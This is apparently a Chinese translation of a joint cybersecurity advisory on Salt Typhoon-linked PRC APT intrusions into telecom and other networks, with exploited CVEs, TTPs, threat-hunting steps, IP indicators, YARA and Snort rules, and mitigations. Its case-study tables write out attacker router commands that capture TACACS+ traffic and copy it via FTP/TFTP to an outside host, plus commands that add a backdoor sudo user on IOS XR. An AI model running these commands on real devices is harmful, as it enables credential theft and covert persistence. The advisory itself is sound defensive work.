剖析全球网络入侵：中国国家级APT组织的技战术与防御指南

应对全球范围内中国国家级行为体入侵网络以支持全球间谍系统

网络安全咨询

最后修订日期： 2025年9月3日
警报代码： AA25-239A

执行摘要

中华人民共和国（PRC）国家支持的网络威胁行为体正在全球范围内瞄准网络，包括但不限于电信、政府、交通、住宿和军事基础设施网络。这些行为体不仅专注于主要电信提供商的大型骨干路由器，以及提供商边缘（PE）和客户边缘（CE）路由器，还利用受感染的设备和可信连接转向其他网络。这些行为体经常修改路由器以维持对网络的持久、长期访问。

此活动部分与网络安全行业报告的威胁行为体重叠——通常被称为“Salt Typhoon”、“OPERATOR PANDA”、“RedMike”、“UNC5807”和“GhostEmperor”等。撰写机构不采用特定的商业命名惯例，在本咨询报告中此后将更泛泛地称负责此网络威胁活动的行为体为“高级持续性威胁（APT）行为体”。在美国、澳大利亚、加拿大、新西兰、英国和全球其他地区已观察到此类网络威胁活动集群。

本网络安全咨询（CSA）包含来自各种政府和行业调查的观察结果，其中APT行为体针对内部企业环境以及直接向客户提供服务的系统和网络。本CSA详细介绍了这些APT行为体利用的战术、技术和程序，以促进检测和威胁狩猎，并提供了缓解指导，以降低来自这些APT行为体及其TTP的风险。

技术细节

以下部分汇编了APT行为体自至少2021年以来用于瞄准企业环境的TTP。特别值得注意的TTP包括修改路由器配置以在网络之间进行横向移动，以及使用网络设备上的虚拟化容器来规避检测。

初始访问

与这些APT行为体相关的调查表明，他们在利用受感染基础设施中公开已知的常见漏洞和暴露（CVE）以及其他可避免的弱点方面取得了相当大的成功。迄今为止尚未观察到零日漏洞的利用。随着新漏洞的发现以及目标实施缓解措施，APT行为体可能会继续调整其战术，并可能扩大对现有漏洞的利用。

如果尚未修补，防御者应优先处理以下CVE，因为这些CVE历史上被这些APT行为体在暴露的网络边缘设备上利用过。按年份排序的示例利用CVE包括：

• CVE-2024-21887 - Ivanti Connect Secure 和 Ivanti Policy Secure Web组件命令注入漏洞，通常与CVE-2023-46805（身份验证绕过）串联使用。
• CVE-2024-3400 - Palo Alto Networks PAN-OS GlobalProtect任意文件创建导致操作系统命令注入。当GlobalProtect在特定版本/配置上启用时，该CVE允许对防火墙进行未经身份验证的远程代码执行。
• CVE-2023-20273 - Cisco IOS XE软件Web管理用户界面身份验证后命令注入/权限提升（通常与用于初始访问的CVE-2023-20198串联使用，以实现以root身份执行代码）。
• CVE-2023-20198 - Cisco IOS XE Web用户界面身份验证绕过漏洞。
• CVE-2018-0171 - Cisco IOS 和 IOS XE Smart Install 远程代码执行漏洞。

APT行为体利用基础设施，例如虚拟专用服务器和受感染的中间路由器，这些基础设施尚未归因于公开已知的僵尸网络或混淆网络基础设施，以瞄准电信和网络服务提供商，包括ISP。

APT行为体可能瞄准边缘设备，无论谁拥有特定设备。拥有与行为体核心目标兴趣不一致的实体的设备仍然为进入感兴趣目标提供了攻击途径的机会。行为体利用受感染的设备以及可信连接或私有互连（例如，提供商到提供商或提供商到客户链路）转向其他网络。在某些情况下，行为体修改路由并在受感染的网络设备上启用流量镜像（在可用的情况下使用SPAN/RSPAN/ERSPAN），并配置GRE/IPsec隧道和静态路由以实现相同目标。

持久性

为了保持对目标网络的持久访问，APT行为体使用了多种技术。值得注意的是，其中许多技术可以混淆行为体在系统日志中的源IP地址，因为他们的操作可能被记录为源自本地IP地址。具体APT行动包括：

• 修改访问控制列表以添加IP地址。这种更改允许行为体绕过安全策略并通过明确允许来自威胁行为体控制的IP地址的流量来维持持续访问。
• 打开标准和非标准端口，这可以打开和暴露各种不同的服务（例如SSH、SFTP、RDP、FTP、HTTP、HTTPS）。此策略提供了远程访问和数据渗漏的多种途径。此外，利用非标准端口可以帮助APT行为体规避专注于标准端口活动的安全监控工具的检测。
• 启用SSH服务器并在网络设备上开放面向外部的端口以维持加密的远程访问。在某些情况下，SSH服务建立在高的非默认TCP端口上，使用22x22或xxx22的端口编号方案，尽管端口模式可能因入侵而异。
• 启用或滥用内置的HTTP/HTTPS管理服务器，有时将它们重新配置为非默认的高端口。
• 在被CVE-2023-20198影响的Cisco设备上启用HTTP/HTTPS服务器。
• 在受感染的路由器上，观察到以下命令和活动：
  • 通过SNMP执行命令。
  • 来自远程或本地IP地址的SSH活动。
  • Web界面面板（POST）请求。
  • 使用服务或自动化凭据（例如，被RANCID等配置归档系统使用的凭据）来枚举和访问其他网络设备。
  • 在tclsh可用的Cisco IOS设备上执行Tcl脚本。
• 根据受感染网络设备上SNMP的配置，APT行为体会枚举并尽可能更改同一团体组中其他设备的配置。正确配置的SNMPv3比以前的版本要安全得多。
• 创建隧道协议，例如GRE、多点GRE或IPsec，推测基于环境中预期的内容。这些隧道允许多个网络层协议通过单个隧道进行封装，可以为数据传输创建持久和隐蔽的通道，以混入正常的网络流量。
• 在支持的Cisco网络设备上的本地Linux容器中运行命令，以暂存工具、本地处理数据并在环境内横向移动。这通常允许APT行为体进行恶意活动而未被检测到，因为容器内的活动和数据未受到密切监控。
• 利用开源的多跳穿透工具，例如STOWAWAY，为命令和控制以及操作员访问构建链式中继。

横向移动和收集

在初始访问之后，APT行为体瞄准涉及身份验证的协议和基础设施——例如TACACS+——以促进跨网络设备的横向移动，通常通过SNMP枚举和SSH。从这些设备中，APT行为体被动地收集特定ISP客户网络的包捕获（PCAP）。为了进一步支持发现和横向移动，APT行为体可能瞄准：

• 身份验证协议，包括TACACS+和RADIUS。
• 管理信息库。
• 路由器接口。
• 资源预留协议会话。
• 边界网关协议路由。
• 已安装的软件。
• 配置文件。
  这是通过现有网络源（例如，提供程序脚本的输出）或通过对设备和TFTP（包括MPLS配置信息）的主动调查实现的。
• 使用本机功能通过SPAN、RSPAN或ERSPAN捕获或镜像传输中的网络流量。
• 提供商持有的数据，例如：
  • 用户信息。
  • 用户内容。
  • 客户记录和元数据。
  • 网络图、清单、设备配置和供应商列表。
  • 密码。

数据渗漏

APT行为体滥用对等连接（即网络之间的直接互连，允许在不通过中介的情况下交换流量）是数据渗漏的一个关键问题。由于缺乏政策约束或系统配置限制对等ISP接收的数据类型，可能助长了数据渗漏。

分析表明，APT行为体利用单独的（可能是多个）命令和控制通道进行数据渗漏，以在高流量节点（如代理和NAT池）的噪音中隐藏其数据窃取。APT行为体经常使用隧道，例如IPsec和GRE，来执行C2和数据渗漏活动。

案例研究

收集本机PCAP

APT行为体使用受感染系统上的本机工具收集PCAP，主要目标可能是捕获TCP端口49上的TACACS+流量。如果知道加密密钥，TACACS+数据包体可以被解密。在至少一个案例中，设备配置使用Cisco Type 7可逆混淆编码存储了TACACS+共享密钥。从配置中恢复该密钥将能够离线解密捕获的TACACS+有效负载。TACACS+流量用于身份验证，通常用于网络设备的管理，包括高权限网络管理员账户和凭据，这很可能使行为体能够入侵更多账户并执行横向移动。

表1：用于收集PCAP的命令

命令	描述
monitor capture mycap interface <接口名称> both	设置名为‘mycap’的数据包捕获
monitor capture mycap match ipv4 protocol tcp any any eq 49	在上述接口上目标端口49 - TACACS+
monitor capture mycap buffer size 100
monitor capture mycap start	开始捕获
show monitor capture mycap buffer brief	检查捕获状态
monitor capture mycap export bootflash:tac.pcap	将PCAP导出到文件，为渗漏做准备
copy bootflash:tac.pcap ftp://<域名/服务>:*@<IP>	渗漏
copy bootflash:tac.pcap tftp://<IP>/tac.pcap

主机级指标：

• 捕获名称：'mycap'
• 捕获规则：'match ipv4 protocol tcp any any eq 49'
• 导出的pcap文件名：'tac.pcap'
• tftp远程文件名：'tac.pcap'
• tftp远程IP：[远程IP]

在IOS XR上启用对底层Linux主机的SSH访问

Cisco IOS XR（64位）是一个基于Linux的网络操作系统，构建在基于Yocto的Wind River Linux发行版上。IOS XR通常通过IOS XR CLI在TCP/22端口或通过控制台进行管理。

内置的sshd_operns服务在主Linux上公开了一个额外的SSH端点。启用后，它在TCP/57722上监听，并提供对主机操作系统的直接shell访问。root登录不允许访问此服务，只有非root账户可以进行身份验证。

在IOS XR上，sshd_operns默认禁用，必须显式启动。跨重启的持久性需要在init时启用或等效操作。

在观察到的入侵中，APT行为体启用了sshd_operns，创建了一个本地用户，并授予其sudo权限（例如，通过编辑/etc/sudoers或在/etc/sudoers.d/下添加文件）以在通过TCP/57722登录后获取主机操作系统的root权限。

表2：将用户添加到sudoers的命令

命令	描述
service sshd_operns start	启动sshd_operns服务
useradd cisco password cisco	添加新用户
sudo vi /etc/sudoers	将新用户添加到sudoers
chmod 4755 /usr/bin/sudo	由于4755是sudo的默认权限，目前不清楚行为体为何执行此命令

威胁狩猎指南

撰写机构强烈鼓励关键基础设施组织（尤其是电信组织）的网络防御者执行威胁狩猎，并在适当时进行事件响应活动。如果怀疑或确认恶意活动，组织应考虑根据适用法律和法规向相关机构和监管机构进行的所有强制性报告要求，以及向适当机构（例如可以提供事件响应指导和缓解帮助的网络安全或执法机构）进行的任何额外自愿报告。

本咨询报告中描述的恶意活动通常涉及对网络的持久、长期访问，APT行为体在其中维持多种访问方法。网络防御者在安排防御措施时应谨慎行事，以最大限度地实现完全驱逐的机会，同时遵守其司法管辖区内关于事件响应和数据泄露通知的适用法律、法规和指南。在可能的情况下，全面了解APT行为体对网络的访问范围，然后同时采取措施将其移除，可能是实现彻底和持久驱逐所必需的。部分响应行动可能会提醒行为体正在进行调查，并危及进行全面驱逐的能力。一个网络上的事件响应也可能导致APT行为体采取措施隐藏和维护他们在其他受感染网络上的访问，并可能破坏已经在进行的更广泛的调查和操作框架。

APT行为体经常采取措施保护他们已建立的访问权限，例如入侵邮件服务器或管理员设备/账户以监控其活动是否已被发现的迹象。组织应采取措施保护其威胁狩猎和事件响应的详细信息免受APT行为体监控活动的影响。

监控配置更改

• 拉取所有运行中网络设备的配置，并与最新授权版本核对差异。
• 审查远程访问配置是否正确应用了ACL和传输协议。审查ACL是否有任何未经授权的修改。
• 如果正在使用SNMP，请确保网络设备配置为使用具有适当身份验证和隐私配置的SNMPv3。
• 验证任何已配置的本地账户及其权限级别的真实性。
• 检查所有路由表，确保所有路由都经过授权且符合预期。
• 验证在网络设备上配置的任何PCAP命令是否经过授权。

监控虚拟化容器

• 如果网络设备具有运行虚拟化容器的能力，请确保所有正在运行的虚拟化容器都是预期和授权的。
• 对于支持Cisco Guest Shell的设备，不要仅依赖设备系统日志来检测行为体活动。结合使用设备系统日志、AAA命令审计、容器日志和离箱流量/遥测。
• 使用AAA审计捕获生命周期和CLI活动，以便记录启用/禁用和进入操作。
• 对于IOS XE，搜寻guestshell enable、guestshell run bash和guestshell disable。在NX-OS上，搜寻guestshell enable、run guestshell和guestshell destroy。对chvrf和dohost的意外使用发出警报。

监控网络服务和隧道

• 监控在非标准端口上运行的管理服务。
• 搜寻行为体偏爱的协议模式：
  • 来自非管理员源IP的、采用22x22/xxx22编号模式的高非默认端口上的SSH。
  • 可从管理VRF外部访问的非默认高端口（18xxx）上的HTTPS/Web UI监听器。
  • TCP/57722的可达性或流量。
• 搜寻指向未经批准IP或任何离开管理VRF的TACACS+流量。与设备配置关联以检测TACACS+服务器重定向到APT行为体控制的基础设施。
• 源自网络设备到未经批准目的地的FTP/TFTP流量，尤其是在设备上PCAP收集活动之后。
• 审计任何穿越安全边界的隧道，以确保网络管理员可以对其做出解释。特别是检查：
  • 自治系统号之间无法解释或意外的隧道。
  • 未经授权使用FTP和TFTP等文件传输协议。
  • 监控网络流量中到内部FTP服务器的异常大量文件传输。
  • 针对路由器的大量SSH活动，随后建立入站和出站隧道——每个隧道可能利用不同的协议。

监控固件和软件完整性

• 对固件执行哈希验证，并将值与供应商的数据库进行比较，以检测对固件的未经授权修改。确保固件版本符合预期。
• 将磁盘和内存中映像的哈希值与已知良好值进行比较。
• 使用产品的运行时内存验证或完整性验证工具来识别对运行时固件映像的任何更改。
• 在平台支持的情况下，启用映像和配置完整性功能。对任何启动时或运行时验证失败发出警报。
• 检查可能存在的任何可用文件目录，查找非标准文件。

监控日志

• 审查从网络设备转发的日志，查找潜在恶意行为的迹象，例如：
  • 清除本地存储日志的证据。
  • 禁用日志创建或日志转发。
  • 使用可用功能启动PCAP录制过程。
  • 允许通过非标准方法或到新位置的远程访问。
  • 通过非标准方法或从未预期的位置更改设备配置。
• 对任何设备上数据包捕获或SPAN/RSPAN/ERSPAN会话定义的创建/启动发出警报。
• 清点并持续监视SPAN/ERSPAN和PCAP状态。
• 在支持的情况下，部署嵌入式事件触发器以系统日志记录任何数据包捕获或span/erspan配置命令的调用。
• 审计在XR主机Linux上被授予sudo权限的非root本地账户。在支持的情况下，确保主机操作系统sshd_operns服务已禁用且未在监听。在每次重启和设备升级时进行验证。
• 对指示新XR主机操作系统服务、systemd服务状态更改或主机操作系统上意外权限提升的配置或遥测发出警报。
• 分析内部FTP服务器日志中任何来自意外源的登录。
• 监控网络流量中从一台路由器到另一台路由器的登录，因为这不应是正常路由器管理过程的典型情况。

如果发现未经授权的活动，在禁用之前协调遏制顺序，以避免向活跃的APT操作员发出警报。捕获实时工件，然后清除。

入侵指标

基于IP的指标

以下IP指标与APT行为体从2021年8月到2025年6月的活动相关。
免责声明： 其中几个观察到的IP地址最早于2021年8月被发现，可能已不再被APT行为体使用。撰写机构建议组织在采取行动（例如阻断）之前调查或审查这些IP地址。

表3：APT相关基于IP的指标，2021年8月-2025年6月

1.222.84[.]29	103.169.91[.]231	103.199.17[.]238	103.253.40[.]199
103.7.58[.]162	104.194.129[.]137	104.194.147[.]15	104.194.150[.]26
104.194.153[.]181	104.194.154[.]150	104.194.154[.]222	107.189.15[.]206
14.143.247[.]202	142.171.227[.]16	144.172.76[.]213	144.172.79[.]4
146.70.24[.]144	146.70.79[.]68	146.70.79[.]81	167.88.164[.]166
167.88.172[.]70	167.88.173[.]158	167.88.173[.]252	167.88.173[.]58
167.88.175[.]175	167.88.175[.]231	172.86.101[.]123	172.86.102[.]83
172.86.106[.]15	172.86.106[.]234	172.86.106[.]39	172.86.108[.]11
172.86.124[.]235	172.86.65[.]145	172.86.70[.]73	172.86.80[.]15
190.131.194[.]90	193.239.86[.]132	193.239.86[.]146	193.43.104[.]185
193.56.255[.]210	212.236.17[.]237	23.227.196[.]22	23.227.199[.]77
23.227.202[.]253	37.120.239[.]52	38.71.99[.]145	43.254.132[.]118
45.125.64[.]195	45.125.67[.]144	45.125.67[.]226	45.146.120[.]210
45.146.120[.]213	45.59.118[.]136	45.59.120[.]171	45.61.128[.]29
45.61.132[.]125	45.61.133[.]157	45.61.133[.]31	45.61.133[.]61
45.61.133[.]77	45.61.133[.]79	45.61.134[.]134	45.61.134[.]223
45.61.149[.]200	45.61.149[.]62	45.61.151[.]12	45.61.154[.]130
45.61.159[.]25	45.61.165[.]157	5.181.132[.]95	59.148.233[.]250
61.19.148[.]66	63.141.234[.]109	63.245.1[.]34	74.48.78[.]66
74.48.78[.]116	74.48.84[.]119	85.195.89[.]94	89.117.1[.]147
89.117.2[.]39	89.41.26[.]142	91.231.186[.]227	91.245.253[.]99
2001:41d0:700:65dc::f656[:]929f	2a10:1fc0:7::f19c[:]39b3

自定义SFTP客户端

APT行为体还使用自定义SFTP客户端，这是一个用Go语言编写的Linux二进制文件，用于将加密档案从一个位置传输到另一个位置。

以下SFTP客户端二进制文件相似之处在于它们都用于将文件从受感染网络传输到暂存主机，在那里文件为渗漏做准备。请注意，cmd1具有在受感染网络上收集网络数据包捕获的额外功能。注意：cmd3和cmd1客户端很可能由同一开发人员编写，因为它们具有相似的构建路径字符串和代码结构。

表4：cmd3 SFTP客户端

属性	值
文件名	cmd3
MD5哈希	eba9ae70d1b22de67b0eba160a6762d8
SHA256哈希	8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1
文件大小（字节）	3506176
文件类型	ELF 64位LSB可执行文件，x86-64版本1（SYSV）静态链接，Go BuildID，已剥离
命令行用法	./cmd3 <加密配置字符串>
版本字符串	v1.0
构建路径字符串	C:/work/sync/cmd/cmd3/main.go

表5：cmd1 SFTP客户端

属性	值
文件名	cmd1
MD5哈希	33e692f435d6cf3c637ba54836c63373
SHA256哈希	f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4
文件大小（字节）	3358720
文件类型	ELF 64位LSB可执行文件，x86-64版本1（SYSV）静态链接，Go BuildID，已剥离
命令行用法	./cmd1 <加密配置字符串>
版本字符串	V20240816
构建路径字符串	C:/work/sync_v1/cmd/cmd1/main.go

Cmd1 SFTP客户端Yara规则

rule SALT_TYPHOON_CMD1_SFTP_CLIENT {meta:description = "Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting."strings:$s1 = "monitor capture CAP"$s2 = "export ftp://%s:%s@%s%s"$s3 = "main.CapExport"$s4 = "main.SftpDownload"$s5 = ".(*SSHClient).CommandShell"$aes = "aes.decryptBlockGo"$buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"condition:(uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and        uint32(uint32(0x3C)) == 0x00004550) or ((uint32(0) == 0xcafebabe)        or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf)        or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe)        or (uint32(0) == 0xcffaedfe)))        and 5 of them
}

表6：new2 SFTP客户端

属性	值
文件名	new2
SHA256哈希	da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e
文件类型	ELF 64位LSB可执行文件，x86-64，版本1（SYSV），动态链接

New2 SFTP客户端Yara规则

rule SALT_TYPHOON_NEW2_SFTP_CLIENT {meta:description = "Detects the Salt Typhoon New2 SFTP client. Rule is meant for threat hunting."strings:$set_1_1 = "invoke_shell"$set_1_2 = "execute_commands"$set_1_3 = "cmd_file"$set_1_4 = "stop_event"$set_1_5 = "decrypt_message"$set_2_1 = "COMMANDS_FILE"$set_2_2 = "RUN_TIME"$set_2_3 = "LOG_FILE"$set_2_4 = "ENCRYPTION_PASSWORD"$set_2_5 = "FIREWALL_ADDRESS"$set_3_1 = "commands.log"$set_3_2 = "Executing command: {}"$set_3_3 = "Connecting to: {}"$set_3_4 = "Network sniffer script."$set_3_5 = "tar -czvf - {0} | openssl des3 -salt -k password -out {0}.tar.gz"$set_required = { 00 70 61 72 61 6D 69 6B 6F }condition:$set_required and 4 of ($set_1_*) and 4 of ($set_2_*)        and 4 of ($set_3_*)
}

表7：sft SFTP客户端

属性	值
文件名	sft
SHA256哈希	a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe
文件类型	ELF 64位LSB可执行文件，x86-64，版本1（SYSV），静态链接，Go BuildID，带调试信息，未剥离

CVE-2023-20198 Snort规则

alert tcp any any -> any $HTTP_PORTS (msg:"Potential CVE-2023-20198 exploit attempt - HTTP Request to Add Privilege 15 User Detected"; content:"POST"; http_method; pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/i"; http_uri; content:"<request xmlns=\"urn:cisco:wsma-config\" correlator=\"execl\">"; http_client_body; content:"<configApply details=\"all\">"; http_client_body; content:"<config-data>"; http_client_body; content:"<cli-config-data-block>"; http_client_body; content:"username"; http_client_body; content:"privilege 15"; http_client_body; content:"secret"; http_client_body; sid:1000003; rev:1;)

缓解措施

这些APT行为体在使用公开已知的CVE访问网络方面取得了相当大的成功，因此强烈鼓励组织优先考虑以与此威胁相称的方式进行修补，例如通过排序补丁以首先解决最高风险。有关更多信息，请参阅CISA的已知被利用漏洞目录。具体来说，组织应确保边缘设备不易受到本咨询报告中确定的已知被利用CVE的攻击。

一般建议

• 定期审查网络设备（尤其是路由器）日志和配置，查找任何意外、未授权或不寻常活动的证据，特别是本咨询报告中列出的活动。特别是检查：
  • 意外的GRE或其他隧道协议，特别是与外国基础设施的。
  • 设置为TACACS+或RADIUS服务器的意外外部IP，或其他AAA服务配置修改。
  • ACL中的意外外部IP。
  • 意外的数据包捕获或网络流量镜像设置。
  • 在网络设备上运行的意外虚拟容器，或者，在预期虚拟容器的情况下，容器内的意外命令。
• 采用稳健的变更管理流程，包括定期审计设备配置。
• 尝试在缓解之前识别疑似入侵的全部范围。虽然遏制入侵和防止进一步的恶意活动很重要，但如果未完全识别和缓解全部范围，行为体可能会保留访问权限并导致进一步的恶意活动。威胁狩猎和事件响应工作应权衡总体的潜在恶意活动与完全驱逐和最小化损害的目标。
• 禁用来自管理接口的出站连接，以限制网络设备之间可能的横向移动活动。
• 禁用所有未使用的端口和协议。仅使用加密和经过身份验证的管理协议，并禁用所有其他协议，尤其是未加密的协议。
• 更改所有默认管理凭据，特别是网络设备和其他网络设备的。
• 要求对管理角色进行公钥身份验证。在操作可行的情况下禁用密码身份验证。最小化身份验证尝试和锁定窗口，以减慢暴力破解和喷洒尝试。
• 使用供应商推荐的网络设备操作系统版本，并使用所有补丁保持更新。将不受支持的设备升级到供应商提供安全更新的受支持设备。

强化管理协议和服务

• 实施管理平面隔离和控制平面策略。
• 将所有设备管理服务严格放置在专用的带外管理网络或管理VRF中。
• 确保此管理VRF没有路由泄漏到客户或对等VRF，并且不能从数据平面或对等地址空间发起或接收会话。
• 阻止除明确授权的收集器之外的所有来自管理VRF的出口。
• 在控制平面应用明确的管理平面ACL以允许列表并限制管理协议。
• 仅使用SSHv2并禁用Telnet。审计并限制在APT行为体常用的非默认端口上的SSH。
• 如果操作上需要Web界面，请将其仅绑定到管理VRF/接口。仅使用HTTPS并禁用未加密的HTTP。要求对Web界面访问进行AAA。监控并对在入侵中观察到的非默认高端HTTPS端口发出警报。
• 仅使用SNMPv3，并禁用SNMPv1和SNMPv2。配置可信管理器和ACL以将SNMP访问限制为仅受信任的设备。
• 更改所有弱默认SNMP团体字符串。限制和监视SNMP写入。强制执行具有authPriv的SNMPv3，并应用排除配置更改MIB对象的VACM视图。
• 持续监控SNMP SET操作，并对AAA服务器、HTTP/HTTPS启用或端口更改、隧道接口、SPAN/ERSPAN会话以及路由和ACL对象的更改发出警报。
• 为所有管理协议配置仅强密码套件，并拒绝所有弱密码套件。
• 强制执行每个协议的速率限制，以减缓凭据猜测和“低且慢”地滥用内置功能。
• 消除意外的IPv6管理暴露。如果启用了IPv6，则应用与IPv4等效的控制。

实施稳健的日志记录

• 确保启用日志记录并转发到集中式服务器。
• 确保发送到集中式日志记录服务器的所有日志都通过安全、经过身份验证和加密的通道传输。
• 为特权命令启用AAA命令审计，以记录任何尝试调用这些命令的操作。

路由最佳实践

• 在可能的情况下利用路由身份验证机制。
• 保护经常被滥用于秘密重定向的对等和边缘路由路径。
• 持续验证静态路由、基于策略的路由和对等边缘的VRF泄漏策略。
• 强制执行最大前缀限制、严格的前缀/AS路径过滤以及所有外部BGP会话上的“仅预期”团体。
• 启用TTL安全或等效功能以减少非路径攻击面。
• 要求会话保护并监控来自意外管理源的BGP会话重置和参数更改。

虚拟专用网络最佳实践

• 删除默认的VPN IKE策略和相关组件。
• 创建符合适用的加密算法使用要求和指南的IKE策略。

Cisco特定建议

• 禁用Cisco Smart Install功能。
• 使用强加密存储凭据。在支持的情况下使用Type 8保护Cisco网络设备上的本地凭据。不要使用Type 7，并尽可能从Type 5过渡。
• 禁用来自VTY的出站连接。这可以防止通过VTY从设备启动SSH、Telnet或其他客户端会话，从而降低其作为跳板机的效用。监视对此设置的任何更改。
• 审计在TCP/57722上意外启用IOS XR主机SSH。这在默认情况下是禁用的，但已观察到被行为体启用以实现持久性。
• 当不需要时，通过在适用的Cisco网络设备上运行no ip http server和no ip http secure-server来禁用Web配置界面。
• 确保在所有已配置的ACL中添加最终的deny any any log行。这确保被拒绝的连接会被记录，以便以后可以查看。

缓解Guest Shell滥用

• 在不需要操作的情况下禁用Guest Shell。
• 在禁用Guest Shell的地方，限制（重新）启用Guest Shell。
• 强制执行AAA命令授权，以便只有批准的角色才能运行相关的Guest Shell命令。
• 在使用Guest Shell的地方：
  • 将容器日志转发到您的SIEM。
  • 配置Guest Shell使用的VRF。
  • 执行设备存储的定期清点和完整性检查。
  • 为guestshell disable/guestshell destroy和意外的chvrf/dohost使用创建警报。
    更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码